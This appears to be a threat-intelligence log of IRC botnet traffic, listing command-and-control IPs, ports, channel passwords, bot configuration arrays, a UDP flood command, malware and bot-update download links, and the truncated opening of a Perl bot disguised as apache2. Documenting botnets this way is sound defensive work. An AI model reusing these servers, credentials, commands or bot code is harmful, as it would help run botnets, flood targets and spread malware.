Remote Host Port Number
199.15.234.7 80
70.34.196.90 1888
PASS strike
NICK n{US|XPa}vihzehv
USER vihzehv 0 0 :vihzehv
JOIN #asdf strike
JOIN #XP
JOIN #US
hosting infos: http://whois.domaintools.com/70.34.196.90
nooip.no-ip.org (rat hosted in United States Gigenet)
Resolved : [nooip.no-ip.org] To [69.65.19.116]
Resolved : [nooip.no-ip.org] To [69.65.19.117]
TCP Connection Attempts:
69.65.19.116:81
69.65.19.117:81
exe file: http://b809236e.whackyvidz.com
hosting infos: http://whois.domaintools.com/69.65.19.116
82.114.82.60 (linux bots hosted in Serbia Kujtesa Net Sh.p.k)
var $config = array("server"=>"82.114.82.60", "port"=>"5454", "pass"=>"", "prefix"=>"chk-", "maxrand"=>"4", "chan"=>"#fuck", "chan2"=>"#fuck", "key"=>"ok", "modes"=>"+p", "password"=>"ok", "trigger"=>".", "hostauth"=>"*"
hosting infos: http://whois.domaintools.com/82.114.82.60
174.127.115.9 (linux bots hosted in United States Providence Hosting Services Inc)
var $config = array("server"=>"174.127.115.9", "port"=>"2525", "pass"=>"", "prefix"=>"RR|", "maxrand"=>"8", "chan"=>"#RR", "chan2"=>"", "key"=>"", "modes"=>"+p", "password"=>"pass", "trigger"=>".", "hostauth"=>"*"
Now talking in #RR
Topic On: [ #RR ] [ 174.36.56.72 Room ! ]
Topic By: [ DnsZ ]
Modes On: [ #RR ] [ +nts ]
hosting infos: http://whois.domaintools.com/174.127.115.9
109.68.191.160 (ngrBot hosted in Russian Federation Moscow Jsc Tel Company)
Remote Host Port Number
109.68.191.160 1863
PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 40 domain(s)
NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #IrcPeru PeruRulz!!
JOIN #US
PRIVMSG #IrcPeru :[d="http://magicforkidsparty.com/images/Thumbs.db.exe" s="159744 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Qcxaxq.exe" – Download retries: 0
174.120.234.158 80
199.15.234.7 80
200.63.96.41 80
PRIVMSG #IrcPeru :[DNS]: Blocked 0
119.59.99.235 (ngrBot hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number
119.59.99.235 1234
PASS priv9
199.15.234.7 80
NICK n{US|XP}xqtebyy
USER xqtebyy 0 0 :xqtebyy
JOIN #ngr HELO
Now talking in #ngr
Topic On: [ #ngr ] [ .stop right there ]
Topic By: [ bob ]
* Home.Town sets mode: +o ru
(ru) .udp 82.8.195.242 8080 120
(ru) .udp 82.8.195.242 8080 120
cyba.sytes.net (irc botnet hosted in Seychelles Ideal Solution Ltd)
Resolved : [cyba.sytes.net] To [193.107.16.150]
Remote Host Port Number
193.107.16.150 20
NICK NEW[XX][XP]6615537921
USER 6615 "" "TsGh" :6615
MODE NEW[XX][XP]6615537921
JOIN #yup
JOIN #ys
PONG :irc.kittynet.com
Remote Host Port Number
193.107.16.47 20
96.9.162.23 80
NICK NEW[XX][XP]4288113806
JOIN #galla
PRIVMSG #galla :Down & Exc…OK
PONG :irc.kittynet.com
USER 4288 "" "TsGh" :4288
MODE NEW[XX][XP]4288113806
JOIN #ys
PRIVMSG
64.32.28.19 (irc botnet hosted in United States Huntington Beach Sharktech Internet Services)
Remote Host Port Number
64.32.28.19 6667
USER ^GCIeq`{TehIQ[yuE ^GCIeq`{TehIQ[yuE "^GCIeq`{TehIQ[yuE" :^GCIeq`{TehIQ[yuE
NICK ^GCIeq`{TehIQ[yuE
PONG 422
JOIN #ib :insbt
PRIVMSG #ib :keylogger enabled
hosting infos: http://whois.domaintools.com/64.32.28.19
90mb malware samples
Another package with 90mb of malware samples, have fun reversing.
Download: http://e12ade83.urlbeat.net
216.245.202.52 (linux bot hosted in United States Limestone Networks Inc)
Here is the bot used by the hackers:
#!/usr/bin/perl
################################################
use HTTP::Request;                             #
use HTTP::Request::Common;                     #
use HTTP::Request::Common qw(POST);            #
use LWP::Simple;                               #
use LWP 5.53;                                  #
use LWP::UserAgent;                            #
use Socket;                                    #
use IO::Socket;                                #
use IO::Socket::INET;                          #
use IO::Select;                                #
use MIME::Base64;                              #
################################################
my $datetime = localtime;
my $fakeproc = "/usr/sbin/apache2 -k start";
my